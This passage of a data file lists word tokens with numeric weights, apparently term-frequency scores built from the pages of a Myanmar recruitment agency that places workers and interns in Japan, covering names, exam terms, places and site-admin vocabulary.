('1st', 0.00335364),
('1th', 0.00590886),
('2', 0.00171369),
('20', 0.0385808),
('200', 0.0475679),
('2000', 0.181962),
('200000', 0.1435),
('2001', 0.30103),
('20012002', 0.30103),
('2004', 0.0579919),
('20042005', 0.30103),
('2005', 0.271758),
('20052006', 0.30103),
('201', 0.188059),
('20132014', 0.187562),
('20142015', 0.187811),
('2022', 0.30103),
('2023', 0.00590377),
('2024', 0.0184834),
('2027', 0.176091),
('2062024', 0.09691),
('2072024', 0.09691),
('2100', 0.0669468),
('2122024', 0.00796893),
('2152024', 0.176091),
('2182024', 0.176091),
('22', 0.0457575),
('2212024', 0.176091),
('2242024', 0.00782534),
('2252024', 0.176091),
('2462000', 0.30103),
('25', 0.0544989),
('250000', 0.228374),
('2562024', 0.00742402),
('262024', 0.00532883),
('265', 0.30103),
('26520052006', 0.30103),
('295', 0.30103),
('29520042005', 0.09691),
('2952024', 0.00796893),
('2living', 0.176091),
('2nd', 0.00203417),
('2th', 0.00590886),
('3', 0.00384545),
('30', 0.0386276),
('3092024', 0.0511525),
('3162024', 0.0511525),
('32', 0.127865),
('3222024', 0.0669468),
('3272024', 0.176091),
('330', 0.131335),
('35', 0.131845),
('350000', 0.30103),
('36', 0.124939),
('362023', 0.30103),
('3must', 0.176091),
('3rd', 0.30103),
('3th', 0.01524),
('4', 0.0222257),
('403', 0.00624895),
('4032024', 0.176091),
('403404', 0.00532883),
('404', 0.00599611),
('4062024', 0.176091),
('4092024', 0.176091),
('4102024', 0.176091),
('4152024', 0.176091),
('4222024', 0.176091),
('43', 0.124939),
('45', 0.30103),
('4must', 0.176091),
('5', 0.00250926),
('500', 0.30103),
('500000', 0.30103),
('50000000', 0.09691),
('5082024', 0.176091),
('5182023', 0.124939),
('5182024', 0.0321847),
('5192024', 0.0511525),
('5202024', 0.0234811),
('5232024', 0.09691),
('5242024', 0.176091),
('5262023', 0.124939),
('5292024', 0.0669468),
('530', 0.30103),
('5302024', 0.176091),
('5556677', 0.091755),
('5must', 0.176091),
('6', 0.0256707),
('60', 0.00513964),
('6022024', 0.124939),
('6032023', 0.0457575),
('6042024', 0.09691),
('6062024', 0.0511525),
('6072024', 0.176091),
('6132024', 0.176091),
('6142023', 0.124939),
('6172024', 0.176091),
('6192023', 0.124939),
('6202023', 0.0347621),
('6212023', 0.0579919),
('6222023', 0.124939),
('6232023', 0.124939),
('6242024', 0.176091),
('6252024', 0.00673338),
('6262024', 0.00673338),
('6272024', 0.0263289),
('632', 0.30103),
('7', 0.00740133),
('7012023', 0.09691),
('7032023', 0.00998422),
('7042023', 0.30103),
('7082023', 0.0669468),
('7092023', 0.124939),
('7212023', 0.0413927),
('7262023', 0.30103),
('73', 0.00285518),
('735', 0.30103),
('74', 0.076206),
('775556677', 0.0915519),
('8', 0.0416812),
('8172023', 0.30103),
('8252023', 0.09691),
('8252026', 0.176091),
('8262026', 0.0669468),
('8272026', 0.30103),
('8282026', 0.30103),
('839330', 0.251536),
('8393300', 0.124939),
('8393344', 0.0913639),
('8393393', 0.0914328),
('872023', 0.176091),
('9', 0.0484972),
('900', 0.00360954),
('902', 0.30103),
('908', 0.176091),
('909', 0.0669468),
('923', 0.176091),
('929', 0.124939),
('930', 0.176091),
('931', 0.124939),
('937', 0.176091),
('942', 0.176091),
('942024', 0.00796893),
('943', 0.176091),
('948', 0.176091),
('949', 0.124939),
('95015742', 0.0214651),
('955', 0.30103),
('95556677', 0.0699658),
('956', 0.176091),
('959', 0.056085),
('9752510732', 0.130078),
('9775556677', 0.025189),
('9775556677018393300018393344', 0.0700144),
('97755566770995094749109501574209965104911', 0.30103),
('97755566770995094749109501574209965104911018393300', 0.30103),
('9950947491', 0.0252029),
('9950947491095015742', 0.136038),
('9965104911', 0.09691),
('9971286882', 0.129955),
('9must', 0.30103),
('a32', 0.176091),
('abilities', 0.30103),
('ability', 0.00543687),
('able', 0.0285508),
('about', 0.00169521),
('above', 0.129955),
('abroad', 0.30103),
('abu', 0.00768683),
('abundant', 0.30103),
('accentscurrently', 0.30103),
('access', 0.0034028),
('accessible', 0.0457575),
('accessing', 0.0669468),
('accompanying', 0.09691),
('accordance', 0.186808),
('according', 0.176091),
('account', 0.00133849),
('accountname', 0.124939),
('accounts', 0.00170659),
('achieve', 0.30103),
('achievement', 0.30103),
('achieving', 0.30103),
('acquire', 0.30103),
('action', 0.00607208),
('actions', 0.0101824),
('active', 0.176091),
('actively', 0.30103),
('activities', 0.00742541),
('add', 0.000776796),
('added', 0.0102561),
('adding', 0.000556586),
('addition', 0.0243114),
('additional', 0.000276374),
('address', 0.0157943),
('addresses', 0.124939),
('adin', 0.00729924),
('adjust', 0.0489353),
('admin', 0.0024888),
('administer', 0.00236809),
('administering', 0.124939),
('administration', 0.00827253),
('administrative', 0.000523081),
('administrator', 0.0580451),
('administrators', 0.0118992),
('admiration', 0.30103),
('adults', 0.30103),
('advance', 0.09691),
('advanced', 0.00974867),
('advantage', 0.30103),
('adventure', 0.30103),
('advice', 0.30103),
('affordable', 0.30103),
('after', 0.00558036),
('afternoon', 0.176091),
('afterwards', 0.0697516),
('again', 0.0457575),
('aged', 0.176091),
('agency', 0.00115592),
('agricultural', 0.30103),
('aim', 0.176091),
('akita', 0.124939),
('alias', 0.00168006),
('all', 0.00320214),
('alleviate', 0.30103),
('allow', 0.0135133),
('allows', 0.00607354),
('already', 0.0104654),
('also', 0.00248571),
('alter', 0.142623),
('alternative', 0.124939),
('alternatively', 0.0669747),
('although', 0.176091),
('always', 0.30103),
('american', 0.127504),
('among', 0.30103),
('amount', 0.30103),
('ancestors', 0.30103),
('and', 0.000101258),
('announce', 0.30103),
('anonymous', 0.00762432),
('another', 0.00857568),
('answer', 0.124939),
('any', 0.00478506),
('anyone', 0.0669468),
('apache', 0.0118992),
('appear', 0.0263289),
('appearance', 0.00229956),
('applicantsnew', 0.30103),
('application', 0.30103),
('applications', 0.30103),
('applied', 0.0413927),
('apply', 0.00679185),
('appointed', 0.30103),
('apprehension', 0.30103),
('approach', 0.124939),
('appropriate', 0.0579919),
('appropriately', 0.124939),
('approval', 0.124939),
('approved', 0.124939),
('approximate', 0.30103),
('april', 0.176091),
('architectural', 0.30103),
('are', 0.000158267),
('area', 0.0170554),
('areas', 0.30103),
('around', 0.176091),
('arrange', 0.176091),
('arranged', 0.30103),
('arrangements', 0.30103),
('arrival', 0.00590886),
('arrive', 0.30103),
('arriving', 0.176091),
('aspects', 0.30103),
('assigned', 0.0457575),
('assistance', 0.176091),
('assistant', 0.30103),
('assisting', 0.30103),
('assumptions', 0.124939),
('attached', 0.0263289),
('attend', 0.00496342),
('attention', 0.0691719),
('aung', 0.000784487),
('authentic', 0.30103),
('authentically', 0.30103),
('authenticated', 0.0130012),
('authorized', 0.124939),
('auto', 0.0470082),
('automatically', 0.0281709),
('available', 0.000962808),
('await', 0.30103),
('awaits', 0.30103),
('aware', 0.136023),
('away', 0.124939),
('ayawaddy', 0.30103),
('aye', 0.176091),
('bachelor', 0.176091),
('back', 0.0791812),
('background', 0.176091),
('backing', 0.30103),
('bago', 0.23198),
('ban', 0.0669468),
('bank', 0.176091),
('bar', 0.129763),
('base', 0.00484583),
('based', 0.176091),
('basic', 0.00150965),
('basics', 0.195444),
('batch', 0.00075727),
('bayint', 0.176091),
('because', 0.0377886),
('become', 0.30103),
('bed', 0.30103),
('been', 0.0083092),
('beginner', 0.109832),
('behalf', 0.30103),
('behave', 0.30103),
('behavior', 0.0241515),
('behind', 0.30103),
('being', 0.0164986),
('belief', 0.09691),
('believe', 0.132905),
('below', 0.00530141),
('besides', 0.30103),
('best', 0.0222764),
('better', 0.124939),
('between', 0.0694676),
('beverage', 0.00768683),
('beware', 0.00774535),
('beyond', 0.126649),
('big', 0.30103),
('blank', 0.124939),
('block', 0.000508369),
('blocked', 0.124939),
('blocks', 0.0012463),
('blog', 0.0202034),
('body', 0.0248236),
('bokalay', 0.30103),
('boss', 0.00567713),
('both', 0.0110663),
('bottom', 0.0282201),
('box', 0.0107382),
('boxes', 0.0202034),
('brackets', 0.124939),
('branches', 0.30103),
('breaks', 0.0347621),
('bride', 0.0511525),
('bridges', 0.30103),
('brings', 0.124939),
('brother', 0.203025),
('brothers', 0.30103),
('browsers', 0.124939),
('bue', 0.09691),
('bugs', 0.0347621),
('builder', 0.30103),
('building', 0.0743385),
('buildings', 0.135062),
('built', 0.224836),
('bulk', 0.00241174),
('bunpou', 0.30103),
('burmese', 0.102675),
('bus', 0.245576),
('buses', 0.30103),
('business', 0.0848585),
('businesses', 0.101369),
('but', 0.00776104),
('butter', 0.124939),
('button', 0.00966643),
('buying', 0.104255),
('bwar', 0.00717858),
('cache', 0.00171387),
('cached', 0.0157943),
('caches', 0.0235849),
('cad', 0.176091),
('calculating', 0.30103),
('calculation', 0.124939),
('calculations', 0.0457575),
('calendar', 0.124939),
('called', 0.0179796),
('came', 0.00742402),
('can', 0.000314038),
('cancel', 0.0110905),
('canceled', 0.023523),
('candidates', 0.09691),
('cannot', 0.0234811),
('capable', 0.30103),
('car', 0.0801913),
('card', 0.138548),
('care', 0.0456565),
('carefully', 0.124939),
('careless', 0.30103),
('carried', 0.30103),
('carry', 0.30103),
('categories', 0.09691),
('categorize', 0.124939),
('cause', 0.176091),
('celebrate', 0.00567713),
('center', 0.00284489),
('centers', 0.30103),
('certain', 0.0669468),
('certificate', 0.176091),
('certificates', 0.30103),
('challenge', 0.30103),
('challenges', 0.176091),
('chan', 0.00729924),
('chance', 0.30103),
('chang', 0.00706185),
('change', 0.00460903),
('changed', 0.0159012),
('changes', 0.0116537),
('changing', 0.00200598),
('chanyaw', 0.30103),
('chapter', 0.30103),
('characters', 0.30103),
('charge', 0.01524),
('charity', 0.30103),
('chaw', 0.00768683),
('check', 0.00392157),
('checkbox', 0.0669468),
('checked', 0.0157943),
('cherish', 0.30103),
('children', 0.09691),
('childrenit', 0.30103),
('chinese', 0.124939),
('chit', 0.00396619),
('chitt', 0.30103),
('choice', 0.0669468),
('choose', 0.00944144),
('choosing', 0.0457575),
('chose', 0.0669468),
('chosen', 0.0669468),
('choukai', 0.194278),
('cicero', 0.0511525),
('cities', 0.198373),
('citizens', 0.30103),
('city', 0.0378382),
('civil', 0.138303),
('cjk', 0.0349926),
('claro', 0.045917),
('class', 0.00112954),
('classes', 0.0527513),
('classified', 0.129313),
('classify', 0.0234914),
('classroom', 0.179531),
('clear', 0.0104654),
('cleared', 0.124939),
('clearing', 0.00513964),
('click', 0.000850856),
('clicking', 0.0177616),
('clicks', 0.124939),
('clients', 0.131957),
('close', 0.124939),
('code', 0.0177288),
('codes', 0.0109954),
('coe', 0.000552186),
('collectively', 0.124939),
('college', 0.103166),
('coltd', 0.0579919),
('column', 0.0111024),
('combo', 0.30103),
('come', 0.0328181),
('comet', 0.00102563),
('cometadmin', 0.00877392),
('coming', 0.30103),
('comments', 0.000541015),
('commerce', 0.206924),
('commercial', 0.30103),
('committed', 0.176091),
('common', 0.0457575),
('commonlyused', 0.0457575),
('communication', 0.133791),
('communications', 0.0511525),
('community', 0.176091),
('companies', 0.100179),
('company', 0.00421058),
('complete', 0.00245459),
('completed', 0.187312),
('completely', 0.30103),
('completing', 0.30103),
('completion', 0.00292653),
('complex', 0.0396251),
('components', 0.00360412),
('composed', 0.124939),
('comprehension', 0.30103),
('comprehensive', 0.124939),
('computer', 0.0897762),
('concept', 0.00180234),
('concepts', 0.0730676),
('concluded', 0.30103),
('conditions', 0.0579919),
('condominium', 0.30103),
('conducting', 0.30103),
('confidence', 0.30103),
('confident', 0.30103),
('configuration', 0.000248315),
('configure', 0.00112447),
('configured', 0.0122473),
('configuring', 0.000327398),
('confirm', 0.124939),
('confirmation', 0.0669468),
('confused', 0.124939),
('congralutations', 0.00208295),
('congrats', 0.000421032),
('congratulation', 0.00400274),
('congratulations', 0.000149731),
('connect', 0.101538),
('connecting', 0.0893709),
('conquer', 0.30103),
('consistently', 0.30103),
('consists', 0.124939),
('constantly', 0.219068),
('constructed', 0.30103),
('construction', 0.0117549),
('constructionservice', 0.30103),
('consultants', 0.30103),
('contact', 0.00239543),
('contain', 0.0457575),
('containing', 0.0236747),
('contains', 0.0362888),
('content', 0.000158576),
('context', 0.0302231),
('contextual', 0.00181236),
('continue', 0.0107239),
('continued', 0.30103),
('continues', 0.30103),
('continuously', 0.30103),
('contractor', 0.30103),
('contributed', 0.0041532),
('convenient', 0.30103),
('conversation', 0.30103),
('cooking', 0.124939),
('coopening', 0.30103),
('cooperate', 0.30103),
('cooperated', 0.30103),
('cooperation', 0.01524),
('coordinator', 0.30103),
('core', 0.0010372),
('correct', 0.0109085),
('corrupted', 0.134244),
('cost', 0.19211),
('costs', 0.30103),
('could', 0.0181173),
('couldn', 0.176091),
('countries', 0.0862951),
('country', 0.0457575),
('course', 0.0266466),
('courses', 0.00648603),
('covered', 0.30103),
('covering', 0.30103),
('create', 0.00109401),
('created', 0.00336414),
('creating', 0.000463262),
('creation', 0.00755314),
('crew', 0.30103),
('criteria', 0.00760607),
('critical', 0.0669468),
('cron', 0.00100384),
('cuisine', 0.30103),
('culture', 0.0420246),
('cultures', 0.30103),
('curated', 0.124939),
('current', 0.0108016),
('currently', 0.0280287),
('custom', 0.00895484),
('customer', 0.30103),
('customized', 0.124939),
('customs', 0.30103),
('dar', 0.00729924),
('data', 0.00181195),
('database', 0.0180576),
('date', 0.00531118),
('daughters', 0.0669468),
('day', 0.0107239),
('days', 0.124939),
('dear', 0.30103),
('death', 0.0347621),
('decades', 0.0511525),
('dedicated', 0.124939),
('dedication', 0.124939),
('deducted', 0.30103),
('deducting', 0.176091),
('deepened', 0.30103),
('default', 0.00111451),
('degree', 0.0241614),
('dekiru', 0.30103),
('delay', 0.30103),
('delete', 0.009895),
('deleted', 0.00479888),
('deleting', 0.00523781),
('deletion', 0.00755314),
('delighted', 0.30103),
('delivering', 0.30103),
('demonstrating', 0.09691),
('departed', 0.30103),
('departing', 0.0791812),
('department', 0.30103),
('departmental', 0.30103),
('departure', 0.0299774),
('dependencies', 0.124939),
('depending', 0.0280287),
('deputy', 0.0579919),
('description', 0.00343318),
('design', 0.145646),
('designing', 0.30103),
('desired', 0.00526874),
('desiring', 0.30103),
('desperately', 0.00415596),
('detail', 0.30103),
('details', 0.0162948),
('develop', 0.30103),
('developed', 0.30103),
('development', 0.00254619),
('dfsdf', 0.30103),
('dhabi', 0.00768683),
('difference', 0.30103),
('different', 0.0111479),
('difficulties', 0.30103),
('difficultiesupon', 0.30103),
('dignity', 0.30103),
('diligence', 0.30103),
('diligent', 0.30103),
('dining', 0.124939),
('diploma', 0.30103),
('directly', 0.0385005),
('disabled', 0.0114473),
('disabling', 0.00176902),
('discard', 0.126293),
('discipline', 0.30103),
('disease', 0.30103),
('display', 0.000896928),
('displayed', 0.00338042),
('displayname', 0.124939),
('displays', 0.00653087),
('distinguished', 0.30103),
('dive', 0.0971446),
('divided', 0.09691),
('division', 0.30103),
('documentation', 0.00182827),
('does', 0.0123393),
('doing', 0.30103),
('dokkai', 0.193977),
('dollar', 0.176091),
('don', 0.0326873),
('done', 0.0232194),
('doors', 0.30103),
('download', 0.00360412),
('downloaded', 0.0177288),
('drastic', 0.124939),
('dress', 0.124939),
('driven', 0.30103),
('dropdown', 0.0280287),
('dropped', 0.124939),
('drug', 0.30103),
('drupal', 0.00046496),
('dsfsdfsd', 0.30103),
('dubai', 0.00745135),
('due', 0.124939),
('dummy', 0.0511525),
('duration', 0.176091),
('during', 0.0579919),
('e71', 0.0518489),
('e72', 0.0518489),
('e73', 0.00455687),
('e74', 0.0519425),
('each', 0.00284764),
('eager', 0.30103),
('eaindra', 0.00694886),
('early', 0.30103),
('earn', 0.30103),
('earned', 0.124939),
('easy', 0.151257),
('economy', 0.30103),
('edit', 0.000588428),
('editing', 0.000820447),
('education', 0.146241),
('educational', 0.130442),
('effectively', 0.30103),
('efficiently', 0.124939),
('eight', 0.176091),
('either', 0.0134419),
('elderly', 0.111926),
('ele', 0.0511525),
('electrical', 0.00479888),
('electronic', 0.176091),
('element', 0.124939),
('elements', 0.124939),
('eliminating', 0.30103),
('email', 0.0039953),
('embark', 0.18206),
('embarked', 0.09691),
('embrace', 0.30103),
('emphasizing', 0.30103),
('employ', 0.30103),
('employed', 0.01524),
('employees', 0.124939),
('employers', 0.30103),
('employment', 0.0542113),
('empowers', 0.30103),
('enabled', 0.0087692),
('enabling', 0.00267259),
('enclosed', 0.124939),
('encounter', 0.30103),
('encountering', 0.30103),
('encouragement', 0.09691),
('encourages', 0.30103),
('end', 0.0110342),
('endeavors', 0.30103),
('engage', 0.30103),
('engineer', 0.00490733),
('engineering', 0.0791812),
('engineers', 0.00755512),
('english', 0.0186513),
('enhance', 0.30103),
('enough', 0.0791812),
('enroll', 0.0126534),
('enrolled', 0.30103),
('enrollment', 0.30103),
('ensure', 0.176091),
('ensures', 0.176091),
('ensuring', 0.176091),
('enter', 0.00328923),
('entering', 0.0791812),
('enters', 0.124939),
('enthusiasts', 0.013364),
('entities', 0.00444822),
('entity', 0.000778327),
('entry', 0.176091),
('environment', 0.30103),
('environments', 0.30103),
('equipment', 0.127071),
('error', 0.00363297),
('errors', 0.00416249),
('established', 0.0869136),
('estimate', 0.124939),
('etc', 0.0174085),
('ethical', 0.243138),
('ethnic', 0.30103),
('etiquette', 0.30103),
('even', 0.133894),
('every', 0.30103),
('everyone', 0.013364),
('everything', 0.176091),
('exact', 0.0669468),
('exam', 0.0526062),
('example', 0.00353753),
('examplecom', 0.00517068),
('examples', 0.0347621),
('excel', 0.176091),
('excellent', 0.09691),
('except', 0.13469),
('exciting', 0.013364),
('excluding', 0.190975),
('exclusive', 0.0147233),
('exemplary', 0.30103),
('exemployees', 0.30103),
('exercises', 0.30103),
('exist', 0.124939),
('existence', 0.30103),
('existing', 0.00210744),
('exists', 0.0669468),
('expand', 0.09691),
('expect', 0.124939),
('expenses', 0.0579919),
('experience', 0.00547857),
('experienced', 0.0263289),
('experiencemoreover', 0.30103),
('experiences', 0.176091),
('experimental', 0.00575233),
('expert', 0.00516194),
('expertise', 0.30103),
('experts', 0.0791812),
('expiring', 0.124939),
('explain', 0.124939),
('explained', 0.0137883),
('explore', 0.30103),
('exposed', 0.0151933),
('express', 0.30103),
('expressions', 0.30103),
('extend', 0.00252914),
('facebook', 0.195229),
('facilitate', 0.18527),
('facilitated', 0.30103),
('facilitating', 0.30103),
('factories', 0.187807),
('fair', 0.244252),
('fairpriced', 0.30103),
('familiar', 0.30103),
('family', 0.30103),
('famous', 0.30103),
('fantastic', 0.30103),
('far', 0.124939),
('faster', 0.0457575),
('fcaw', 0.30103),
('fdsdf', 0.30103),
('february', 0.09691),
('fee', 0.0710248),
('feed', 0.0457575),
('feel', 0.30103),
('feels', 0.30103),
('fees', 0.0511525),
('female', 0.176091),
('ferry', 0.176091),
('fewer', 0.124939),
('field', 0.000583931),
('fields', 0.00080023),
('filing', 0.176091),
('filter', 0.00345475),
('filtering', 0.0474168),
('filters', 0.00171257),
('finally', 0.147826),
('financial', 0.124939),
('find', 0.00287422),
('finesse', 0.30103),
('finished', 0.0669468),
('fire', 0.30103),
('first', 0.00425896),
('fisheryrelated', 0.30103),
('fix', 0.124939),
('fixed', 0.0669468),
('flat', 0.0669468),
('flight', 0.30103),
('floor', 0.176091),
('follow', 0.00868855),
('following', 0.00662031),
('food', 0.00663491),
('footer', 0.035693),
('for', 0.0000939907),
('foreign', 0.00686543),
('form', 0.000578435),
('format', 0.00184581),
('formats', 0.00133633),
('formatted', 0.0143261),
('fostering', 0.30103),
('fosters', 0.30103),
('founded', 0.105274),
('four', 0.30103),
('free', 0.09691),
('fresh', 0.30103),
('fri', 0.00389504),
('friday', 0.30103),
('from', 0.00112761),
('fukuoka', 0.0580772),
('fulfillment', 0.30103),
('full', 0.0267533),
('fully', 0.029633),
('function', 0.0457575),
('functionality', 0.00362358),
('further', 0.30103),
('future', 0.0143293),
('gain', 0.0791812),
('gaishoku', 0.00811789),
('gaishuku', 0.30103),
('garment', 0.30103),
('gave', 0.0579919),
('general', 0.00758325),
('generate', 0.0669468),
('generated', 0.0457575),
('generating', 0.136466),
('generation', 0.30103),
('get', 0.0115819),
('getting', 0.000563653),
('ginou', 0.176091),
('give', 0.0200287),
('given', 0.0669468),
('gmailcom', 0.0102234),
('goal', 0.000113973),
('goals', 0.30103),
('goes', 0.0583256),
('going', 0.30103),
('golden', 0.30103),
('good', 0.0377886),
('got', 0.30103),
('goukaku', 0.30103),
('government', 0.19693),
('graduate', 0.176091),
('graduated', 0.176091),
('grammar', 0.30103),
('granting', 0.124939),
('gratitude', 0.30103),
('great', 0.176091),
('green', 0.124939),
('grid', 0.0234811),
('group', 0.00367224),
('grown', 0.30103),
('growth', 0.188796),
('guidance', 0.30103),
('guide', 0.000516095),
('guided', 0.09691),
('guiding', 0.30103),
('habit', 0.30103),
('had', 0.131731),
('handles', 0.151257),
('handling', 0.0351328),
('hands', 0.30103),
('handson', 0.176091),
('happen', 0.124939),
('happens', 0.034854),
('happy', 0.0137883),
('hard', 0.0413927),
('harm', 0.30103),
('has', 0.00145708),
('have', 0.00111907),
('having', 0.100309),
('header', 0.0285406),
('health', 0.0230646),
('healthy', 0.09691),
('help', 0.000628404),
('here', 0.176091),
('heritage', 0.30103),
('hesitate', 0.30103),
('hierarchical', 0.124939),
('hierarchy', 0.0669468),
('high', 0.214933),
('higher', 0.176091),
('highlight', 0.124939),
('highlights', 0.09691),
('highly', 0.09691),
('history', 0.00796893),
('hit', 0.00282474),
('hiv', 0.30103),
('hla', 0.00768683),
('hlaing', 0.00694886),
('hnin', 0.00411657),
('hokkaido', 0.0579919),
('holders', 0.176091),
('home', 0.00914734),
('honesty', 0.30103),
('hose', 0.30103),
('hospitals', 0.30103),
('hostel', 0.176091),
('hostess', 0.00768683),
('hotel', 0.30103),
('hotels', 0.00768683),
('hours', 0.0102192),
('house', 0.30103),
('housing', 0.043005),
('how', 0.00140987),
('however', 0.0669468),
('hpone', 0.176091),
('htet', 0.0413927),
('htike', 0.00694886),
('html', 0.00610649),
('https', 0.0060285),
('htun', 0.00643411),
('htwe', 0.00729924),
('human', 0.30103),
('icon', 0.0457575),
('ideas', 0.176091),
('image', 0.00197908),
('images', 0.00575233),
('immense', 0.30103),
('immerse', 0.30103),
('impact', 0.09691),
('impart', 0.30103),
('implications', 0.0280287),
('import', 0.115775),
('importance', 0.30103),
('important', 0.0986294),
('importation', 0.176707),
('importing', 0.30103),
('improve', 0.00673338),
('inaugural', 0.30103),
('include', 0.024037),
('includes', 0.0511525),
('including', 0.00384253),
('income', 0.124939),
('incorrect', 0.124939),
('index', 0.00221835),
('indexed', 0.0296504),
('indexing', 0.00577569),
('indicating', 0.0242276),
('individual', 0.0224897),
('individuals', 0.30103),
('industrial', 0.106694),
('industries', 0.185457),
('industry', 0.136585),
('information', 0.00211635),
('informational', 0.124939),
('ingredients', 0.0263289),
('insert', 0.124939),
('insight', 0.30103),
('inspect', 0.30103),
('inspected', 0.0579919),
('install', 0.0050053),
('installed', 0.00260704),
('installing', 0.00190208),
('instance', 0.0148174),
('instructed', 0.30103),
('instruction', 0.124939),
('instructions', 0.0352205),
('instructor', 0.30103),
('instructors', 0.124939),
('insurance', 0.176091),
('integrity', 0.0768239),
('interest', 0.0347621),
('interface', 0.000774155),
('interior', 0.30103),
('internal', 0.00640282),
('international', 0.0500963),
('internship', 0.00294438),
('internships', 0.30103),
('interview', 0.00194994),
('interviewpassers', 0.30103),
('interviewpassing', 0.30103),
('interviews', 0.0791812),
('into', 0.00259942),
('invalid', 0.124939),
('invaluable', 0.124939),
('invest', 0.176091),
('iom', 0.124939),
('iris', 0.0768032),
('irrawaddy', 0.30103),
('item', 0.00061194),
('items', 0.0018406),
('its', 0.0066272),
('january', 0.30103),
('japan', 0.0024105),
('japanese', 0.00426913),
('japanwishing', 0.30103),
('javascript', 0.0240614),
('jft', 0.0835376),
('jlpt', 0.00671444),
('job', 0.0283655),
('jobs', 0.0511525),
('join', 0.132408),
('joint', 0.198576),
('journey', 0.0347621),
('joy', 0.176091),
('just', 0.0347621),
('kaigo', 0.0483541),
('kaiwa', 0.30103),
('kanji', 0.133196),
('kaung', 0.00694886),
('kaw', 0.00717858),
('kay', 0.00742402),
('keeping', 0.176091),
('key', 0.0669468),
('keyword', 0.0669468),
('keywords', 0.0457575),
('khaing', 0.00159961),
('khant', 0.00244674),
('khin', 0.0048525),
('khine', 0.0234811),
('khu', 0.00717858),
('kind', 0.30103),
('kitchen', 0.09691),
('know', 0.0518118),
('knowledge', 0.0821439),
('known', 0.0347621),
('korea', 0.00266808),
('korean', 0.00447105),
('koshipa', 0.00454668),
('kyats', 0.176091),
('kyaw', 0.00176902),
('kyi', 0.00717858),
('kyit', 0.176091),
('labeled', 0.0457575),
('labor', 0.30103),
('labour', 0.30103),
('lady', 0.176091),
('lakhs', 0.09691),
('language', 0.000385159),
('languagelearning', 0.30103),
('languages', 0.00192752),
('languagespecific', 0.124939),
('large', 0.0413927),
('larger', 0.124939),
('largest', 0.30103),
('last', 0.0109954),
('lasting', 0.30103),
('later', 0.0241575),
('latt', 0.00729924),
('launch', 0.30103),
('lay', 0.00343318),
('leadership', 0.30103),
('leading', 0.30103),
('leap', 0.0511525),
('learn', 0.0163904),
('learners', 0.30103),
('learning', 0.0420964),
('least', 0.021283),
('led', 0.30103),
('left', 0.014758),
('length', 0.0280287),
('less', 0.124939),
('lesson', 0.30103),
('let', 0.0284962),
('letraset', 0.0511525),
('level', 0.0791812),
('librarian', 0.0511525),
('library', 0.0048525),
('licence', 0.30103),
('license', 0.30103),
('licensed', 0.30103),
('like', 0.0100369),
('limit', 0.0234811),
('limitations', 0.00717858),
('limited', 0.124939),
('lin', 0.00663058),
('link', 0.00155557),
('links', 0.000899086),
('list', 0.00245616),
('listed', 0.00340215),
('listen', 0.30103),
('listening', 0.30103),
('listing', 0.0460951),
('listings', 0.00305987),
('lists', 0.0462121),
('little', 0.176091),
('live', 0.176091),
('living', 0.0791812),
('loads', 0.124939),
('loan', 0.176091),
('local', 0.30103),
('locate', 0.0118992),
('log', 0.0157943),
('logged', 0.0263418),
('logging', 0.0209678),
('loginurl', 0.124939),
('london', 0.0511525),
('long', 0.0433349),
('longer', 0.0669468),
('look', 0.0177288),
('looking', 0.0142475),
('looks', 0.0457575),
('ltd', 0.00249232),
('luck', 0.30103),
('luxury', 0.30103),
('lwin', 0.0413927),
('machine', 0.0234811),
('machinery', 0.176091),
('made', 0.0534322),
('mail', 0.124939),
('main', 0.0182783),
('maintain', 0.30103),
('maintenance', 0.00115209),
('make', 0.00346172),
('makes', 0.128409),
('making', 0.30103),
('malaysia', 0.193731),
('male', 0.176091),
('manage', 0.000387745),
('managed', 0.0280287),
('management', 0.30103),
('manager', 0.0348759),
('managers', 0.0669468),
('managing', 0.000240865),
('mandalay', 0.198169),
('manner', 0.30103),
('manners', 0.30103),
('manually', 0.0142404),
('manufacture', 0.30103),
('many', 0.0182948),
('marked', 0.0347621),
('master', 0.0651009),
('mastery', 0.30103),
('match', 0.0371243),
('matched', 0.124939),
('matches', 0.124939),
('matching', 0.124939),
('materials', 0.191899),
('matter', 0.30103),
('maupin', 0.30103),
('maw', 0.00729924),
('mawlamyine', 0.23251),
('may', 0.00138026),
('meals', 0.09691),
('meat', 0.30103),
('mechanical', 0.104782),
('mechanisms', 0.0347621),
('medium', 0.124939),
('mee', 0.00348833),
('meets', 0.124939),
('memorial', 0.00768683),
('men', 0.176091),
('mentorship', 0.09691),
('menu', 0.000499091),
('message', 0.00301741),
('messages', 0.00976026),
('met', 0.0579919),
('metadata', 0.00694886),
('method', 0.00553907),
('meticulously', 0.30103),
('middle', 0.30103),
('might', 0.0234811),
('migration', 0.176091),
('milestone', 0.30103),
('min', 0.00203417),
('mingal', 0.30103),
('mingalartaungnyunt', 0.124939),
('minimum', 0.0347621),
('minister', 0.0579919),
('ministries', 0.30103),
('ministry', 0.0428643),
('minna', 0.30103),
('misbehaving', 0.124939),
('miss', 0.187312),
('mission', 0.00934003),
('mistakes', 0.125839),
('mitigating', 0.30103),
('mmk', 0.0580741),
('mmkyats', 0.30103),
('mode', 0.00178355),
('modeling', 0.30103),
('modern', 0.30103),
('modify', 0.0280287),
('modifying', 0.001852),
('module', 0.000420056),
('modules', 0.00107959),
('moe', 0.00694886),
('mon', 0.00212369),
('monday', 0.130262),
('money', 0.0973271),
('mong', 0.00768683),
('month', 0.176091),
('months', 0.0592331),
('morals', 0.30103),
('more', 0.00167738),
('moreover', 0.30103),
('morning', 0.124939),
('most', 0.0074947),
('motivated', 0.30103),
('mrhong', 0.00768683),
('multiple', 0.0347621),
('must', 0.00958229),
('mutual', 0.30103),
('myae', 0.00729924),
('myanmagonyi', 0.124939),
('myanmar', 0.0392668),
('myar', 0.00348833),
('myat', 0.00513964),
('myawaddy', 0.30103),
('myint', 0.0707478),
('myo', 0.00185994),
('nagasaki', 0.09691),
('naing', 0.00560388),
('name', 0.00167439),
('nan', 0.00539503),
('nang', 0.00717858),
('nationalities', 0.30103),
('nationals', 0.00742402),
('native', 0.176091),
('nativespeaking', 0.176091),
('nattest', 0.0836656),
('naung', 0.176091),
('navigate', 0.00174503),
('navigation', 0.149974),
('naw', 0.00729924),
('nay', 0.00344808),
('naypyitaw', 0.30103),
('near', 0.176091),
('neatly', 0.176091),
('necessary', 0.0360181),
('need', 0.00301189),
('needed', 0.0146208),
('needs', 0.30103),
('new', 0.000274057),
('newcometagency', 0.0102165),
('news', 0.0115819),
('next', 0.00432137),
('night', 0.30103),
('nihongo', 0.136015),
('niigata', 0.30103),
('nila', 0.00768683),
('nilar', 0.09691),
('node', 0.00624895),
